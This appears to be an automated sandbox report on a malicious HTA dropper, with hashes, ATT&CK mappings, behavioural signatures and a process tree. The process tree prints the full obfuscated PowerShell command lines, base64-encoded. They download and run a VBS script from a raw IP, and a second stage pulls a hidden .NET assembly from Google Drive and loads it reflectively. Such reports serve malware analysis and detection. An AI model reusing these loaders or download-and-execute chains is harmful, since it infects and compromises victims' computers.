fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0

General

Target

fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Size

204KB
MD5

9dbf5ee2610284f5668fb229ba474b95
SHA1

12b3f4c93e36b9bca1bfecf8fa522748d3631c74
SHA256

fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0
SHA512

06fe1b0e3ca4e04108fa8a50f60867e42f38e60768aebbc8935a7c24b973cf3546f6f7f4548e9fac67cebe552319d7323fee5eeaa87dc5f958aa23377cb3ccb2
SSDEEP

96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

pOweRSheLl.ExEpowershell.exe

flow pid process

3 2784 pOweRSheLl.ExE
6 2864 powershell.exe
8 2864 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2864 powershell.exe
3000 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

pOweRSheLl.ExEpowershell.exe

pid process

2784 pOweRSheLl.ExE
2064 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2784	pOweRSheLl.ExE
6	2864	powershell.exe
8	2864	powershell.exe

pid	process
2864	powershell.exe
3000	powershell.exe

pid	process
2784	pOweRSheLl.ExE
2064	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

pOweRSheLl.ExEpowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRSheLl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

pOweRSheLl.ExEpowershell.exepowershell.exepowershell.exe

pid process

2784 pOweRSheLl.ExE
2064 powershell.exe
2784 pOweRSheLl.ExE
2784 pOweRSheLl.ExE
3000 powershell.exe
2864 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2784	pOweRSheLl.ExE
2064	powershell.exe
2784	pOweRSheLl.ExE
2784	pOweRSheLl.ExE
3000	powershell.exe
2864	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

pOweRSheLl.ExEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2784	pOweRSheLl.ExE
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepOweRSheLl.ExEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2952 wrote to memory of 2784	2952	mshta.exe	pOweRSheLl.ExE
PID 2952 wrote to memory of 2784	2952	mshta.exe	pOweRSheLl.ExE
PID 2952 wrote to memory of 2784	2952	mshta.exe	pOweRSheLl.ExE
PID 2952 wrote to memory of 2784	2952	mshta.exe	pOweRSheLl.ExE
PID 2784 wrote to memory of 2064	2784	pOweRSheLl.ExE	powershell.exe
PID 2784 wrote to memory of 2064	2784	pOweRSheLl.ExE	powershell.exe
PID 2784 wrote to memory of 2064	2784	pOweRSheLl.ExE	powershell.exe
PID 2784 wrote to memory of 2064	2784	pOweRSheLl.ExE	powershell.exe
PID 2784 wrote to memory of 2500	2784	pOweRSheLl.ExE	csc.exe
PID 2784 wrote to memory of 2500	2784	pOweRSheLl.ExE	csc.exe
PID 2784 wrote to memory of 2500	2784	pOweRSheLl.ExE	csc.exe
PID 2784 wrote to memory of 2500	2784	pOweRSheLl.ExE	csc.exe
PID 2500 wrote to memory of 2512	2500	csc.exe	cvtres.exe
PID 2500 wrote to memory of 2512	2500	csc.exe	cvtres.exe
PID 2500 wrote to memory of 2512	2500	csc.exe	cvtres.exe
PID 2500 wrote to memory of 2512	2500	csc.exe	cvtres.exe
PID 2784 wrote to memory of 2340	2784	pOweRSheLl.ExE	WScript.exe
PID 2784 wrote to memory of 2340	2784	pOweRSheLl.ExE	WScript.exe
PID 2784 wrote to memory of 2340	2784	pOweRSheLl.ExE	WScript.exe
PID 2784 wrote to memory of 2340	2784	pOweRSheLl.ExE	WScript.exe
PID 2340 wrote to memory of 3000	2340	WScript.exe	powershell.exe
PID 2340 wrote to memory of 3000	2340	WScript.exe	powershell.exe
PID 2340 wrote to memory of 3000	2340	WScript.exe	powershell.exe
PID 2340 wrote to memory of 3000	2340	WScript.exe	powershell.exe
PID 3000 wrote to memory of 2864	3000	powershell.exe	powershell.exe
PID 3000 wrote to memory of 2864	3000	powershell.exe	powershell.exe
PID 3000 wrote to memory of 2864	3000	powershell.exe	powershell.exe
PID 3000 wrote to memory of 2864	3000	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
  "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\djvb2aru.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES713B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC713A.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2512
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES713B.tmp

Filesize
1KB

MD5
dc1739739654bccab033baab240ebe52

SHA1
4ee3a93bbc458251ba539a114260b3d0fd791c7a

SHA256
e9dc32b701c8c4ad32c86e7564db7ceaefae8b968d753874293efc6c62b40f44

SHA512
f32fd27194cee9a5e6f0038d34cbee13fd142c11d0627c6f9e376da39b791c4e5d0789d96bc1f5f8fe099170d15305910b2a8f9537f864bab93410c3708eb184

Download Submit
C:\Users\Admin\AppData\Local\Temp\djvb2aru.dll

Filesize
3KB

MD5
3dfb950a473940ace32a7c867ccf9076

SHA1
bf279fcb4c105e5923900173ea70c10e42e97cf5

SHA256
66beb4d8277c96ace1e07e669723305df351c1646d57cc49c1622a2efb9bc70e

SHA512
8cc7b3612bba28fd96430fa1e77517ebc86d69d452fab9a73d7fc880bff1690f02a9e639e6bdc2de2b387c9707c14be208da3b040b2c2c1f6f910fcb973796bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\djvb2aru.pdb

Filesize
7KB

MD5
47d28c521ffd10fda60ff9c87ea3662c

SHA1
11bab85687d8010b0aeb23c1e5ff1d93a23e2f1b

SHA256
7a39e328db7bca2da514b1b75d09f9b40e01ca7d6dc73762353228698ecbee82

SHA512
8e3174ba7543ea7c03c31c2fcd9d9fd26b75d0f1e94674d90486e6319b334cfb255d742cd765cb660caf1a180f503ef5cf25f1771cad2cc99c2fb3d2077efc9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
802344128fe036532b119b67f3453e1d

SHA1
ae2000823fe69a49698c0ae65c0443b5e5c8b615

SHA256
60cc1bbd7cccf36d1d1fa00b7559deb5e407641f91e722de48b247c4eb4ce39c

SHA512
4c4f23a5e2fcf3acc7670cc17a31af47cdd1849dbbc16622234bd33175f35096f572add5e14dd5b8636268d14b75f4d340a6aefa85ced38b9531bf36b9ea02a6

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Filesize
136KB

MD5
74339d80989d10693dbc1115d1cf3eb4

SHA1
bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44

SHA256
a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d

SHA512
4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC713A.tmp

Filesize
652B

MD5
4ab336f87777597298ef2d5585f4c30b

SHA1
7cda2d4dc4e0b57568269881ee23b0473c53252a

SHA256
b04b54fd4d61d20b15624be12b63935bda4e86440220c98da8ff3dc5d4ba3532

SHA512
5174ad02bdd7471df99713d5a769bc51effd2e0ee7390c73393aa561504f1cd969230141e5f987f6d37e8c345f28ee916c05fa6bd0ec786c5d6773aa1c46e21d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\djvb2aru.0.cs

Filesize
480B

MD5
ce22e90871744b25a04ac8c5691f49cc

SHA1
bc0a93c1fe61e00daa34774994b638d19f735228

SHA256
3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546

SHA512
5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\djvb2aru.cmdline

Filesize
309B

MD5
47ccea66770dd69f044feeb829203f4a

SHA1
1b89af4daeb211bbee5feaec1cb3c2796d6033d6

SHA256
3edc2445b884bfc912b9e2d3ef054c55bb400c806a120c421ee5b41f3e83bd9d

SHA512
f5e626e3d4ed089ee1e68d55d3cd9123b643b0af73530ad4a9dc914c4450665a7a0de38d1d69e8fa03d4b25e232dc46b7802a8014627ead6216792bc9a7b8b4e

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads